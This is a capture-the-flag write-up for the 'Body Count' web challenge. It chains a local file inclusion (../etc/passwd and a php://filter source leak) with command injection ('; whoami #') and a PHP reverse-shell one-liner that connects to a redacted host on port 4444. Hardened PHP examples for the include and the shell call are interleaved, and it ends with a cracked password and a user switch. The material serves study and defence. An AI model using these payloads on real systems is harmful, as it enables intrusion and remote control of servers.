Body Count


img

Loading up the site, we see file=wc.php. Any time I see something like this I always check for LFI.

img

http://chall.csivit.com:30202/?file=../../../etc/passwd

img

So LFI is in play. Let's use the php://filter wrapper to base64-encode the file on the way out and grab the source of wc.php.

http://chall.csivit.com:30202/?file=php://filter/convert.base64-encode/resource=wc.php

After base64-decoding the response, we can get a look at what's going on under the hood.

img

So our cookie needs to match the PASSWORD environment variable for us to get any further.
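The `?file=` include is what makes both the `../` traversal and the php://filter source read possible. As an added example, not the challenge's wc.php (whose source is only visible in the screenshots), here is how that include would be written so that neither request gets through; the page directory, the allowlisted page names and the sample inputs are all constructed for the demonstration:

```php
<?php
// Added example: a hardened replacement for a "?file=<name>" include.
// It is not the challenge's wc.php; the page directory and the allowlisted
// names are assumptions made for this demonstration.

declare(strict_types=1);

const ALLOWED_PAGES = ['wc.php', 'index.php'];   // assumed page names

/**
 * Resolve a user-supplied page name to an absolute path inside $pageDir,
 * or return null if the request must be refused.
 */
function resolve_page(string $pageDir, string $requested): ?string
{
    // 1. No stream wrappers or null bytes: "php://filter/..." is how the
    //    source was leaked, and a null byte can truncate a path.
    if (strpos($requested, '://') !== false || strpos($requested, "\0") !== false) {
        return null;
    }
    // 2. A bare file name only; any directory component (../ included) is refused.
    if (basename($requested) !== $requested) {
        return null;
    }
    // 3. The allowlist is the real control; the checks above just fail early.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }
    // 4. Defence in depth: the resolved path must still sit under $pageDir.
    $real = realpath($pageDir . '/' . $requested);
    $base = realpath($pageDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Constructed page directory so the script runs stand-alone.
$pageDir = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($pageDir);
file_put_contents($pageDir . '/wc.php', "<?php echo 'word count page';\n");

// Constructed inputs: the write-up's two requests plus the intended one.
$inputs = [
    'wc.php',
    '../../../etc/passwd',
    'php://filter/convert.base64-encode/resource=wc.php',
];
foreach ($inputs as $input) {
    $path = resolve_page($pageDir, $input);
    printf("%-52s -> %s\n", $input, $path === null ? 'refused' : 'include ' . $path);
}

unlink($pageDir . '/wc.php');
rmdir($pageDir);
```

Run it with `php` from the command line. The allowlist is the control that actually matters; the wrapper, null-byte and basename checks exist so that a traversal or filter attempt is refused with an obvious reason rather than silently failing the allowlist, and the same `../` and `php://filter` substrings are what an access-log alert for this class of bug should key on.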

Fortunately, robots.txt has a neat disallow.

img

Using the same method that we used to get the source of wc, we can get the source of checkpass.

img

There’s the password. Let’s edit our cookie so we can proceed.

Going back to the source of wc.php, we can see the command it’s running, so all we need to do is inject our own command into it.

'; whoami #'

'; closes the quoted argument and ends the previous command, whoami is our command, and # comments out the rest of the line.

img

Command injection is in play. Let’s get a reverse shell.

'; php -r '$sock=fsockopen("REDACTED",4444);exec("/bin/sh -i <&3 >&3 2>&3");' #'
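The injection works because the file name is spliced into a shell command string, so a single quote in the input closes the argument and the shell parses what follows. As an added example, not the challenge's code (the exact command is only visible in the screenshots, so `wc -w <file>` is an assumption), here is that pattern next to two hardened forms: escapeshellarg(), which keeps the whole value as one argument, and a no-shell proc_open() call, which never gives `;` or `#` a meaning at all. The sample file and directory are constructed, and the escaped output shown assumes a POSIX shell:

```php
<?php
// Added example (not the challenge's wc.php): the assumed vulnerable pattern
// next to a hardened version. "wc -w <file>" is an assumption about the
// command the challenge runs.

declare(strict_types=1);

// Assumed vulnerable pattern: the name is spliced into the command string, so
// a quote in the input closes the argument and the shell parses the rest.
function unsafe_command(string $name): string
{
    return "wc -w '" . $name . "'";
}

// Hardened: escapeshellarg() makes the whole value one argument. Every
// embedded single quote becomes '\'' so the shell never sees a bare ; or #.
function safe_command(string $name): string
{
    return 'wc -w ' . escapeshellarg($name);
}

// Better still: skip the shell. With an array command, proc_open() execs wc
// directly (PHP >= 7.4), so shell metacharacters carry no meaning.
function word_count(string $dir, string $name): ?int
{
    if (basename($name) !== $name) {          // no directory components
        return null;
    }
    $path = realpath($dir . '/' . $name);
    $base = realpath($dir);
    if ($path === false || $base === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                          // not a file inside $dir
    }
    $proc = proc_open(['wc', '-w', $path], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return (int) trim($out);   // wc prints "<count> <path>"; the cast stops at the space
}

$payload = "'; whoami #'";   // the write-up's injection string, used here only as input
echo "unsafe: " . unsafe_command($payload) . "\n";
echo "safe:   " . safe_command($payload) . "\n";

// Constructed sample file so the no-shell version runs stand-alone.
$dir = sys_get_temp_dir() . '/wc_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/sample.txt', "one two three\nfour\n");
var_dump(word_count($dir, 'sample.txt'));   // count of the constructed file
var_dump(word_count($dir, $payload));       // refused: the payload is not a file in $dir

unlink($dir . '/sample.txt');
rmdir($dir);
```

Comparing the two echoed strings shows the difference: in the unsafe form the payload's first quote ends the argument, while escapeshellarg() turns each quote into `'\''` so the entire string remains a single argument to wc. The proc_open() version is the one to prefer, because it also rejects anything that is not a regular file inside the intended directory before any process is started.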

Now that we're in, browsing around the filesystem, I found this directory.

img

And inside that directory is…

img

cracked hash = csictf

Let's switch to the ctf user and browse some of these files.

img